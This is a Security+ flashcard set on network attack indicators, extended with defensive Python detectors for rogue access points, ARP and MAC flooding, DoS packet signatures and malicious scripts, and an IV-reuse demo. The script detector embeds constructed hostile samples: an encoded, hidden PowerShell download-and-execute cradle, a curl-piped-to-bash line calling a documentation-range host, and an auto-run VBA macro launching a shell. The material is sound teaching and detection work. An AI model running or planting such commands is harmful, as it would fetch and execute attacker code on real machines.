1.4 Analyze potential indicators associated with network attacks Flashcards
Used to detect the presence of wireless networks (scanning) and to attempt to break their encryption or authentication (cracking).
Wireless scanner/cracker
An attack in which a hacker operates a false access point that will automatically clone, or twin, the identity of an access point based on a client device’s request to connect.
Evil twin attack
An unauthorized access point. It may be planted by an employee for convenience, or it may be operated externally by an attacker.
Rogue access point
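The two cards above describe what an evil twin and a rogue access point look like from the air: an SSID you own advertised by a BSSID you do not, or an SSID you do not own heard strongly enough to be on your premises. The following is an added example (not part of the flashcard set) that applies those two checks to a scan inventory; the authorized AP list, SSIDs, BSSIDs and RSSI floor are constructed, hypothetical values.

```python
"""Flag evil-twin and rogue access point candidates in a wireless scan.

Added example: the AP inventory and scan results below are constructed
sample data (hypothetical SSIDs and BSSIDs), not output from a real tool.
"""

# Authorized APs: SSID -> set of BSSIDs allowed to advertise it (hypothetical).
AUTHORIZED = {
    "CorpWiFi": {"00:11:22:aa:bb:01", "00:11:22:aa:bb:02"},
    "GuestWiFi": {"00:11:22:aa:bb:10"},
}

# Each scan entry: (ssid, bssid, channel, security, rssi_dbm). Constructed.
SCAN = [
    ("CorpWiFi", "00:11:22:aa:bb:01", 6, "WPA2", -45),
    ("CorpWiFi", "00:11:22:aa:bb:02", 11, "WPA2", -60),
    ("CorpWiFi", "DE:AD:BE:EF:00:01", 6, "OPEN", -38),       # our SSID, unknown BSSID
    ("GuestWiFi", "00:11:22:aa:bb:10", 1, "WPA2", -52),
    ("Printer-Setup", "02:1a:2b:3c:4d:5e", 1, "OPEN", -41),  # unknown SSID, strong signal
    ("NeighborNet", "a4:2b:8c:00:00:07", 3, "WPA2", -85),    # unknown SSID, weak signal
]


def classify_scan(scan, authorized, rogue_rssi_floor=-70):
    """Return a list of findings describing suspicious access points.

    evil_twin:        an SSID we own is advertised by a BSSID not on the list.
                      A security downgrade (OPEN where we run WPA2) is noted,
                      since that is how a twin lures clients into plaintext.
    rogue_candidate:  an SSID we do not own, heard above rogue_rssi_floor,
                      so it is probably physically inside our site.
    neighbor:         unknown SSID heard weakly; informational only.
    """
    allowed = {ssid: {b.lower() for b in bssids} for ssid, bssids in authorized.items()}
    findings = []
    for ssid, bssid, channel, security, rssi in scan:
        bssid = bssid.lower()
        if ssid in allowed:
            if bssid not in allowed[ssid]:
                finding = {"kind": "evil_twin", "ssid": ssid, "bssid": bssid,
                           "channel": channel, "rssi": rssi}
                if security == "OPEN":
                    finding["security_downgrade"] = True
                findings.append(finding)
        elif rssi >= rogue_rssi_floor:
            findings.append({"kind": "rogue_candidate", "ssid": ssid, "bssid": bssid,
                             "channel": channel, "rssi": rssi, "security": security})
        else:
            findings.append({"kind": "neighbor", "ssid": ssid, "bssid": bssid,
                             "channel": channel, "rssi": rssi})
    return findings


if __name__ == "__main__":
    for finding in classify_scan(SCAN, AUTHORIZED):
        print(finding)
```

A real deployment would feed this from a wireless IDS or periodic `iwlist`/`airodump-ng` exports and would refine the rogue test with location data; signal strength alone cannot distinguish a rogue AP inside the building from a strong neighbour next door.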
The unauthorized accessing of data via a Bluetooth connection.
Bluesnarfing
Grants an attacker remote control over the hardware and software of your devices over a Bluetooth connection.
Bluebugging
The sending of unsolicited messages to Bluetooth capable devices without the permission of the owner/user.
Bluejacking
Eavesdropping or packet capturing Bluetooth communications.
Bluesniffing
A DoS attack against a Bluetooth device.
Bluesmacking
A type of wireless management frame that can be abused in wireless attacks, including discovering hidden SSIDs, causing a DoS, hijacking sessions, and enabling on-path attacks.
Disassociation
The transmission of radio signals to prevent reliable communications by decreasing the effective signal-to-noise ratio.
Jamming
A tracking technology based on the ability to power a radio transmitter using current generated in an antenna when placed in a magnetic field.
Radio frequency identification
A standard to establish radio communications between devices in close proximity. It is commonly employed for contactless payments.
Near field communication (NFC)
A value, ideally random and never reused with the same key, that is combined with the key so that encrypting the same plaintext twice produces different ciphertext. Short or reused IVs weaken the cipher and can let an attacker recover plaintext or the key.
Initialization vector (IV)
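The card above says a reused IV weakens a cipher; the added example below (not part of the flashcard set) shows the concrete failure for a stream cipher. The cipher is a toy whose keystream is HMAC-SHA256 over the IV and a counter, used only to make the IV's role visible; it is not a standard algorithm, and the key, IVs and messages are constructed values.

```python
"""Why an initialization vector must be unique: IV reuse in a stream cipher.

Added example. The keystream generator is a toy (HMAC-SHA256 over IV || counter)
that illustrates the IV's role and is not a standard cipher. Key, IVs and
messages are constructed values.
"""
import hashlib
import hmac


def keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Expand (key, iv) into `length` bytes of keystream, block by block."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, iv + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Stream-cipher encryption: ciphertext = plaintext XOR keystream(key, iv).
    Decryption is the same operation, so encrypt(key, iv, ciphertext) = plaintext."""
    return xor_bytes(plaintext, keystream(key, iv, len(plaintext)))


def recover_second_plaintext(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Given two ciphertexts made with the same key AND the same IV, plus the
    plaintext of the first, recover the second without knowing the key:
        c1 XOR c2 = (p1 XOR ks) XOR (p2 XOR ks) = p1 XOR p2
        p2        = (c1 XOR c2) XOR p1
    Recovery covers the overlapping length of the two messages."""
    return xor_bytes(xor_bytes(c1, c2), known_p1)


KEY = b"constructed demo key"          # hypothetical key
IV_A = bytes([0, 0, 0, 0])             # the IV the sender (wrongly) reuses
IV_B = bytes([1, 2, 3, 4])             # a fresh IV for the second message
P1 = b"transfer 100 to alice"          # constructed messages
P2 = b"transfer 900 to mallory"


def demo():
    """Return (plaintext leaked under IV reuse, result when the IV is fresh)."""
    c1 = encrypt(KEY, IV_A, P1)
    c2_reused_iv = encrypt(KEY, IV_A, P2)   # same key, same IV: same keystream
    c2_fresh_iv = encrypt(KEY, IV_B, P2)    # same key, new IV: new keystream
    leaked = recover_second_plaintext(c1, c2_reused_iv, P1)     # == P2[:len(P1)]
    not_leaked = recover_second_plaintext(c1, c2_fresh_iv, P1)  # unrelated bytes
    return leaked, not_leaked


if __name__ == "__main__":
    leaked, not_leaked = demo()
    print("IV reused :", leaked)
    print("IV fresh  :", not_leaked)
```

The same algebra is why WEP, with its 24-bit IV, ran out of fresh IVs on a busy network and why any mode that derives a keystream from (key, IV) must treat the IV as a nonce.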
A communications eavesdropping attack. Attackers position themselves in the communication stream between a client and server.
On-path attack
An on-path attack carried out by malware running inside the victim's browser, which can read or alter web traffic before it is encrypted or after it is decrypted while the session appears normal to the user.
Browser on-path attack
A form of attack in which malicious content is submitted to a vulnerable application, typically a web browser or web server, under the guise of a valid HTML/HTTP header value.
HTTP header manipulation
The act of falsifying the IP-to-MAC address resolution system employed by TCP/IP.
ARP poisoning
Floods a switch with frames carrying bogus source MAC addresses until its MAC (CAM) table is full; the switch then fails open and floods all frames out every port like a hub, letting the attacker sniff traffic.
MAC flooding
Used to impersonate another system, often a valid or authorized network device, to bypass port security or MAC filtering limitations.
MAC cloning/spoofing
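The ARP poisoning and MAC flooding cards above describe two layer 2 attacks that leave distinctive traces: an IP advertised by more than one MAC, and a single switch port suddenly sourcing hundreds of MACs. The added example below (not part of the flashcard set) detects both from constructed records and simulates why a full CAM table leaks traffic. The static gateway binding, addresses, port numbers and the 50-MAC threshold are hypothetical.

```python
"""Layer 2 indicators: ARP poisoning and MAC (CAM table) flooding.

Added example working on constructed records; the addresses, port numbers
and thresholds are hypothetical and would be tuned to a real network.
"""
import random
from collections import defaultdict

# Hypothetical static binding for the gateway (e.g. from DHCP snooping or inventory).
STATIC_BINDINGS = {"192.168.1.1": "00:50:56:aa:00:01"}

# Constructed ARP replies seen on the wire: (sender_ip, sender_mac).
ARP_REPLIES = [
    ("192.168.1.1", "00:50:56:aa:00:01"),
    ("192.168.1.20", "00:50:56:aa:00:14"),
    ("192.168.1.1", "00:0c:29:de:ad:01"),   # a second MAC claiming the gateway IP
    ("192.168.1.1", "00:0c:29:de:ad:01"),
    ("192.168.1.20", "00:0c:29:de:ad:01"),  # the same MAC also claiming a host IP
]


def detect_arp_poisoning(replies, static_bindings=STATIC_BINDINGS):
    """Return (indicator, subject, evidence) tuples for: one IP advertised by
    several MACs, a MAC contradicting a static binding, and one MAC claiming
    several IPs (the two-sided position between a host and its gateway)."""
    macs_per_ip = defaultdict(set)
    ips_per_mac = defaultdict(set)
    for ip, mac in replies:
        macs_per_ip[ip].add(mac.lower())
        ips_per_mac[mac.lower()].add(ip)
    findings = []
    for ip, macs in sorted(macs_per_ip.items()):
        if len(macs) > 1:
            findings.append(("ip_claimed_by_multiple_macs", ip, sorted(macs)))
        expected = static_bindings.get(ip)
        if expected and macs - {expected.lower()}:
            findings.append(("static_binding_violation", ip, sorted(macs - {expected.lower()})))
    for mac, ips in sorted(ips_per_mac.items()):
        if len(ips) > 1:
            findings.append(("mac_claims_multiple_ips", mac, sorted(ips)))
    return findings


class CamTable:
    """Minimal switch forwarding table: once full, new MACs are not learned,
    and frames for an unknown destination are flooded out every port."""

    def __init__(self, capacity):
        self.capacity = capacity
        self.table = {}

    def learn(self, mac, port):
        if mac in self.table or len(self.table) < self.capacity:
            self.table[mac] = port

    def forward(self, dst_mac):
        return self.table.get(dst_mac)   # None means "flood to all ports"


def frames_with_flood(seed=1, flood_count=300):
    """Constructed frames (ingress_port, src_mac): three normal hosts, then a
    burst of random source MACs from port 7 (the attacker's port)."""
    rng = random.Random(seed)
    frames = [(1, "00:50:56:aa:00:14"), (2, "00:50:56:aa:00:15"), (3, "00:50:56:aa:00:01")]
    for _ in range(flood_count):
        octets = tuple(rng.randrange(256) for _ in range(5))
        frames.append((7, "02:%02x:%02x:%02x:%02x:%02x" % octets))
    return frames


def detect_mac_flooding(frames, threshold=50):
    """Ports that sourced more distinct MACs than any real host population would."""
    per_port = defaultdict(set)
    for port, mac in frames:
        per_port[port].add(mac)
    return {port: len(macs) for port, macs in per_port.items() if len(macs) > threshold}


def simulate_fail_open(frames, capacity=128):
    """Replay the frames into a CAM table, then bring up a new host on port 4.
    Returns the port the switch would use for it, or None when it must flood."""
    cam = CamTable(capacity)
    for port, mac in frames:
        cam.learn(mac, port)
    cam.learn("00:50:56:aa:00:99", 4)
    return cam.forward("00:50:56:aa:00:99")


if __name__ == "__main__":
    print(detect_arp_poisoning(ARP_REPLIES))
    frames = frames_with_flood()
    print(detect_mac_flooding(frames))
    print("new host learned on port:", simulate_fail_open(frames))
```

Both checks map to real controls: Dynamic ARP Inspection compares ARP replies against DHCP snooping bindings exactly as `detect_arp_poisoning` does with `STATIC_BINDINGS`, and switch port security caps the number of MACs a port may learn, which is the same threshold `detect_mac_flooding` applies after the fact.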
The falsification of the source address of network packets. As a result, victims are unable to locate the true attackers or initiators of a communication. The attacker may also set the source address to a third party's address so that responses, replies, and echoes are redirected to that system.
IP spoofing
The hierarchical naming scheme used in both public and private networks. It links human-friendly fully qualified domain names (FQDNs) and IP addresses together.
Domain name system (DNS)
The malicious action of changing the registration of a domain name without the authorization of the valid owner.
Domain hijacking
The act of falsifying the DNS information used by a client to reach a desired system.
DNS poisoning
A means to make a web page available through multiple URL addresses or domain names, also known as URL forwarding. Attackers abuse it to send users who requested a legitimate address to a malicious destination.
URL redirection
A scoring system that can be used to determine whether your communications or your site is more likely legitimate or more likely malicious or fraudulent. Sometimes this is called a sender score, especially when it is focusing on email.
Domain reputation
A form of attack that has the primary goal of preventing the victimized system from performing legitimate activity or responding to legitimate traffic.
Denial of service (DoS)
Attacks are waged by first compromising or infiltrating one or more intermediary systems (i.e., bots) that serve as launch points or attack platforms.
Distributed denial of service (DDoS)
Employs an amplification or bounce network, an unwilling or unknowing participant that is able to receive broadcast messages and create message responses, echoes, or bounces.
Distributed reflective denial-of-service (DRDoS)
This DRDoS attack sends ICMP echo request (ping) packets to a network's broadcast address with the source spoofed to the victim's address, so that every host on that network sends its echo reply to the victim.
Smurf attack
This DRDoS attack works like Smurf but uses UDP packets, typically to the echo or chargen ports, instead of ICMP.
Fraggle attack
This DoS attack exploits the TCP three-way handshake by sending many SYNs without completing the handshake, and results in resource exhaustion from half-open connections.
SYN flood
The attacker sends fragments to a victim that when re-assembled result in an oversized ping packet causing a buffer overflow.
Ping of death
Uses the Xmas scan (TCP segments with the FIN, PSH, and URG flags all set) to perform a DoS.
Xmas attack
Sends fragmented packets with overlapping or malformed fragment offsets that the target cannot reassemble correctly, causing it to consume system resources holding onto incomplete reassemblies or to crash.
Teardrop attack
A SYN flood attack where the source and destination addresses are both set to the victim's address, which causes a logical error.
Land attack
An attack where the amount of work or traffic generated by an attacker is multiplied to DoS the victim.
Amplification attacks
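The DoS cards from Smurf through amplification attacks each describe a packet-level signature: a spoofed echo request to a broadcast address, a source equal to the destination, FIN/PSH/URG lit together, a flood of SYNs with no completing ACKs, a fragment that would push a datagram past 65,535 bytes, or fragments whose offsets overlap. The added example below (not part of the flashcard set) classifies simplified packet records against all of those signatures at once. The packet dicts, the SYN threshold and the "last octet 255" broadcast test are constructed simplifications; real input would come from a capture parser.

```python
"""Classify packet records for DoS indicators: Land, Xmas, Smurf/Fraggle
amplification, SYN flood, ping of death and teardrop fragments.

Added example. Packet records are plain dicts constructed below; real input
would come from a capture parser. The SYN threshold and the broadcast test
(last octet 255, i.e. a /24) are simplifications.
"""
import random
from collections import defaultdict

IP_MAX_LEN = 65535


def is_broadcast(ip):
    return ip == "255.255.255.255" or ip.endswith(".255")


def classify_packets(packets, syn_threshold=100):
    """Return a set of (indicator, src, dst) tuples found in the packets."""
    findings = set()
    syns = defaultdict(int)          # destination -> SYN-only segments seen
    acks = defaultdict(int)          # destination -> segments carrying ACK
    frag_ranges = defaultdict(list)  # (src, dst, ip_id) -> [(start, end), ...]

    for p in packets:
        src, dst, proto = p["src"], p["dst"], p["proto"]

        # Land: source and destination are the victim's own address.
        if src == dst:
            findings.add(("land", src, dst))

        if proto == "tcp":
            flags = set(p.get("flags", ""))        # e.g. "S", "SA", "FPU"
            # Xmas: FIN, PSH and URG set together, which no real stack sends.
            if {"F", "P", "U"} <= flags:
                findings.add(("xmas", src, dst))
            if flags == {"S"}:
                syns[dst] += 1
            elif "A" in flags:
                acks[dst] += 1

        # Smurf: ICMP echo request to a directed broadcast; every host on that
        # segment answers the (spoofed) source, which is the real victim.
        if proto == "icmp" and p.get("icmp_type") == 8 and is_broadcast(dst):
            findings.add(("smurf_amplification", src, dst))

        # Fraggle: the same trick over UDP echo (7) or chargen (19).
        if proto == "udp" and is_broadcast(dst) and p.get("dport") in (7, 19):
            findings.add(("fraggle_amplification", src, dst))

        if "frag_offset" in p:
            start = p["frag_offset"] * 8          # offsets are in 8-byte units
            end = start + p["payload_len"]
            # Ping of death: the reassembled datagram would exceed the IP maximum.
            if end > IP_MAX_LEN:
                findings.add(("ping_of_death", src, dst))
            # Teardrop: this fragment overlaps one already held for the datagram.
            key = (src, dst, p["ip_id"])
            if any(start < e and s < end for s, e in frag_ranges[key]):
                findings.add(("teardrop", src, dst))
            frag_ranges[key].append((start, end))

    # SYN flood: many SYNs toward one destination while almost no segments
    # carrying ACK follow, so half-open connections pile up on the victim.
    for dst, n in syns.items():
        if n >= syn_threshold and acks[dst] < n // 10:
            findings.add(("syn_flood", "*", dst))
    return findings


def build_sample(seed=7):
    """Constructed traffic: one legitimate handshake followed by each attack."""
    rng = random.Random(seed)
    victim = "10.0.0.80"
    pkts = [
        {"src": "10.0.0.5", "dst": victim, "proto": "tcp", "flags": "S"},
        {"src": victim, "dst": "10.0.0.5", "proto": "tcp", "flags": "SA"},
        {"src": "10.0.0.5", "dst": victim, "proto": "tcp", "flags": "A"},
        {"src": victim, "dst": victim, "proto": "tcp", "flags": "S"},             # land
        {"src": "203.0.113.9", "dst": victim, "proto": "tcp", "flags": "FPU"},   # xmas
        {"src": victim, "dst": "10.0.1.255", "proto": "icmp", "icmp_type": 8},   # smurf
        {"src": victim, "dst": "10.0.1.255", "proto": "udp", "dport": 7},        # fraggle
        {"src": "198.51.100.7", "dst": victim, "proto": "icmp", "icmp_type": 8,
         "ip_id": 1, "frag_offset": 8189, "payload_len": 100},                   # ping of death
        {"src": "198.51.100.8", "dst": victim, "proto": "udp", "ip_id": 2,
         "frag_offset": 0, "payload_len": 100},
        {"src": "198.51.100.8", "dst": victim, "proto": "udp", "ip_id": 2,
         "frag_offset": 5, "payload_len": 100},                                  # teardrop overlap
    ]
    for _ in range(150):   # SYN flood from random spoofed sources
        pkts.append({"src": "203.0.113.%d" % rng.randrange(1, 255), "dst": victim,
                     "proto": "tcp", "flags": "S"})
    return pkts


if __name__ == "__main__":
    for finding in sorted(classify_packets(build_sample())):
        print(finding)
```

The Smurf and Fraggle rules fire on the victim's address as `src` because the attacker spoofs it; on a real sensor that means the indicator is most useful on the amplifier's network, where the broadcast arrives, and the victim only sees a flood of replies.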
Administrators need to analyze the network for potential indicators associated with network attacks that may have been caused by malicious code or malicious script execution.
Malicious code or script execution
Both a scripting language and a command-line shell for Microsoft Windows. PowerShell can be used to write malicious scripts.
PowerShell
A popular scripting programming language. Python can be used to write malicious scripts.
Python
A command shell and a scripting language. Bash can be used to write malicious scripts.
Bash
A program or script, written in a language such as VBA, that is embedded in documents or other files. Macros can be a powerful tool for automating tasks, but they can also be employed for malicious purposes.
Macros
A powerful programming language that is built into productivity documents. It is the primary language that Office macros are written in.
Visual Basic for Applications
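The cards from "Malicious code or script execution" through VBA list the languages attackers script in; what an analyst actually looks for are the traces those scripts leave, such as a base64 `-EncodedCommand` in a PowerShell process command line, an auto-executing macro that spawns a shell, or a download piped straight into `sh`. The added example below (not part of the flashcard set) decodes an encoded PowerShell command and matches a small set of such indicators across PowerShell, VBA and shell samples. The command lines, macro source and patterns are constructed for illustration and are not a complete detection ruleset.

```python
"""Indicators of malicious script execution in PowerShell, VBA macros and
shell/Python one-liners.

Added example. The command lines and macro source below are constructed
samples written for this illustration; the indicator patterns are a small
illustrative subset, not a complete detection ruleset.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc).
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

POWERSHELL_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download_cradle": re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I),
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
}

MACRO_PATTERNS = {
    "auto_execute": re.compile(r"\b(AutoOpen|Document_Open|Workbook_Open|Auto_Open)\b", re.I),
    "shell_execution": re.compile(r"\b(Shell|WScript\.Shell|CreateObject)\b", re.I),
    "chr_obfuscation": re.compile(r"(Chr\(\d+\)\s*&\s*){3,}", re.I),   # strings built from Chr()
}

SHELL_PATTERNS = {
    "pipe_to_shell": re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "base64_decode": re.compile(r"base64\s+(-d|--decode)|b64decode"),
    "dynamic_eval": re.compile(r"\b(eval|exec)\s*\("),
}


def decode_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell(cmdline):
    """Decode any encoded command, then match indicators against both the
    visible command line and the decoded payload."""
    decoded = decode_powershell(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = {name for name, pat in POWERSHELL_PATTERNS.items() if pat.search(text)}
    if decoded is not None:
        hits.add("encoded_command")
    return {"decoded": decoded, "indicators": sorted(hits)}


def analyze_source(source, patterns):
    """Sorted list of indicator names whose pattern matches the source text."""
    return sorted(name for name, pat in patterns.items() if pat.search(source))


def sample_powershell_cmdline():
    """Constructed: a download cradle hidden behind -EncodedCommand."""
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.20/p.ps1')"
    encoded = base64.b64encode(payload.encode("utf-16-le")).decode()
    return "powershell.exe -nop -w hidden -enc " + encoded


SAMPLE_MACRO = '''Sub AutoOpen()
    Dim s As String
    s = Chr(99) & Chr(109) & Chr(100) & Chr(32) & "/c whoami"
    CreateObject("WScript.Shell").Run s, 0
End Sub'''   # constructed VBA sample

SAMPLE_SHELL = "curl -s http://198.51.100.20/x.sh | bash"   # constructed shell sample


if __name__ == "__main__":
    print(analyze_powershell(sample_powershell_cmdline()))
    print(analyze_source(SAMPLE_MACRO, MACRO_PATTERNS))
    print(analyze_source(SAMPLE_SHELL, SHELL_PATTERNS))
```

Decoding before matching is the important step: the visible command line of an encoded PowerShell invocation contains none of the cradle keywords, so a rule that only inspects the raw process arguments sees `-nop -w hidden -enc` and a blob of base64. PowerShell's own script block logging (Event ID 4104) records the decoded form for the same reason.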